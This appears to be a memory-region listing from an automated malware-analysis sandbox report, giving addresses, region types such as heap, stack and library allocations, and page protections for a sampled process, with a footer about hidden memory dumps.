trusted library allocation
|
page read and write
|
||
|
29B42970000
|
trusted library allocation
|
page read and write
|
||
|
2A348E30000
|
trusted library allocation
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344AC0000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344600000
|
trusted library allocation
|
page read and write
|
||
|
2A3490F3000
|
trusted library allocation
|
page read and write
|
||
|
2A344AA2000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348C3D000
|
heap
|
page read and write
|
||
|
9E13DFE000
|
stack
|
page read and write
|
||
|
29B42803000
|
heap
|
page read and write
|
||
|
8E4E4F9000
|
stack
|
page read and write
|
||
|
1463A6D1000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
2A344AEC000
|
trusted library allocation
|
page read and write
|
||
|
1463A700000
|
trusted library allocation
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
29B427B7000
|
heap
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
28808001000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B42977000
|
trusted library allocation
|
page read and write
|
||
|
1463A8B5000
|
heap
|
page read and write
|
||
|
2A344B18000
|
trusted library allocation
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
14635200000
|
heap
|
page read and write
|
||
|
2A344A9D000
|
heap
|
page read and write
|
||
|
2A348C5F000
|
heap
|
page read and write
|
||
|
1463A792000
|
trusted library allocation
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
1463A7C4000
|
trusted library allocation
|
page read and write
|
||
|
1463A85A000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
8E4E47E000
|
stack
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344AA9000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
29B42870000
|
heap
|
page read and write
|
||
|
2A3449C0000
|
heap
|
page read and write
|
||
|
1FFE9FF0000
|
heap
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
1463A7B5000
|
trusted library allocation
|
page read and write
|
||
|
1FFE9F70000
|
heap
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
7057FE000
|
unkown
|
page readonly
|
||
|
2A348BF1000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
14635329000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
7046FE000
|
unkown
|
page readonly
|
||
|
764000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
146350F0000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
1463A714000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
remote allocation
|
page read and write
|
||
|
774000
|
heap
|
page read and write
|
||
|
2A344A25000
|
heap
|
page read and write
|
||
|
1463529E000
|
heap
|
page read and write
|
||
|
8E4F2CE000
|
stack
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
239C000
|
stack
|
page read and write
|
||
|
7041FE000
|
unkown
|
page readonly
|
||
|
2A344B1C000
|
trusted library allocation
|
page read and write
|
||
|
29B42803000
|
heap
|
page read and write
|
||
|
7045FB000
|
stack
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
74F000
|
heap
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2880D001000
|
trusted library allocation
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A3490F9000
|
trusted library allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348E50000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344A13000
|
heap
|
page read and write
|
||
|
704D7E000
|
stack
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A348C3D000
|
heap
|
page read and write
|
||
|
2A344A0F000
|
heap
|
page read and write
|
||
|
2A344A15000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348C3D000
|
heap
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
29B42751000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
1FFE9FF8000
|
heap
|
page read and write
|
||
|
10AF7F000
|
stack
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A3445C8000
|
trusted library allocation
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
146362A0000
|
trusted library section
|
page readonly
|
||
|
4B2000
|
unkown
|
page read and write
|
||
|
8E4E2FD000
|
stack
|
page read and write
|
||
|
2A344A04000
|
heap
|
page read and write
|
||
|
2A344C31000
|
heap
|
page read and write
|
||
|
293F000
|
stack
|
page read and write
|
||
|
1463A84E000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344A17000
|
heap
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
2A344B24000
|
trusted library allocation
|
page read and write
|
||
|
146352A0000
|
heap
|
page read and write
|
||
|
14635C01000
|
trusted library allocation
|
page read and write
|
||
|
2A344C0E000
|
heap
|
page read and write
|
||
|
2A344A0A000
|
heap
|
page read and write
|
||
|
2D5D000
|
stack
|
page read and write
|
||
|
2A347E90000
|
heap
|
page readonly
|
||
|
C00000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
29B427FD000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
29B427EA000
|
heap
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344A8A000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2358000
|
direct allocation
|
page read and write
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
2326000
|
direct allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
29B42895000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
2A344C21000
|
heap
|
page read and write
|
||
|
1463528A000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
29B4280B000
|
heap
|
page read and write
|
||
|
29B42630000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
1463A6D8000
|
trusted library allocation
|
page read and write
|
||
|
10AEFF000
|
stack
|
page read and write
|
||
|
14635B02000
|
heap
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
2A3449C1000
|
heap
|
page read and write
|
||
|
70517E000
|
stack
|
page read and write
|
||
|
2A344A2E000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2AC5000
|
unclassified section
|
page read and write
|
||
|
1463A734000
|
trusted library allocation
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
29B429A0000
|
trusted library allocation
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
1463A71D000
|
trusted library allocation
|
page read and write
|
||
|
4AB000
|
unkown
|
page read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
2A344A01000
|
heap
|
page read and write
|
||
|
2A3445F0000
|
trusted library allocation
|
page read and write
|
||
|
234A000
|
direct allocation
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
14636640000
|
trusted library allocation
|
page read and write
|
||
|
2A344A26000
|
heap
|
page read and write
|
||
|
1463A7CF000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A348BF8000
|
heap
|
page read and write
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
79A000
|
heap
|
page read and write
|
||
|
2A348EF0000
|
trusted library allocation
|
page read and write
|
||
|
738000
|
heap
|
page read and write
|
||
|
2A344A11000
|
heap
|
page read and write
|
||
|
2A344C5A000
|
heap
|
page read and write
|
||
|
29B42899000
|
heap
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
2A344A19000
|
heap
|
page read and write
|
||
|
70507E000
|
stack
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2740000
|
heap
|
page read and write
|
||
|
29B42803000
|
heap
|
page read and write
|
||
|
1463522B000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C5C000
|
heap
|
page read and write
|
||
|
2A344A0D000
|
heap
|
page read and write
|
||
|
1463A864000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
2A348C5F000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
233C000
|
direct allocation
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
2B8E000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
1463AA70000
|
remote allocation
|
page read and write
|
||
|
2880A801000
|
trusted library allocation
|
page read and write
|
||
|
29B42807000
|
heap
|
page read and write
|
||
|
2A344B1C000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C29000
|
heap
|
page read and write
|
||
|
2A344A57000
|
heap
|
page read and write
|
||
|
2A344C2B000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
2A344A53000
|
heap
|
page read and write
|
||
|
2A344A9D000
|
heap
|
page read and write
|
||
|
1463B000000
|
heap
|
page read and write
|
||
|
2880BC01000
|
trusted library allocation
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344BF0000
|
heap
|
page read and write
|
||
|
2A344A11000
|
heap
|
page read and write
|
||
|
2A348BF0000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344A15000
|
heap
|
page read and write
|
||
|
705FFE000
|
unkown
|
page readonly
|
||
|
79D000
|
heap
|
page read and write
|
||
|
2A348BEE000
|
heap
|
page read and write
|
||
|
2A344A01000
|
heap
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
2A344BF0000
|
heap
|
page read and write
|
||
|
8E4DF8E000
|
stack
|
page read and write
|
||
|
29B4299D000
|
heap
|
page read and write
|
||
|
146362C0000
|
trusted library section
|
page readonly
|
||
|
6AE000
|
stack
|
page read and write
|
||
|
2A347DDE000
|
trusted library allocation
|
page read and write
|
||
|
2A348EB0000
|
trusted library allocation
|
page read and write
|
||
|
1463A88D000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
7054FE000
|
unkown
|
page readonly
|
||
|
2A3445F0000
|
trusted library allocation
|
page read and write
|
There are 936 hidden memdumps, click here to show them.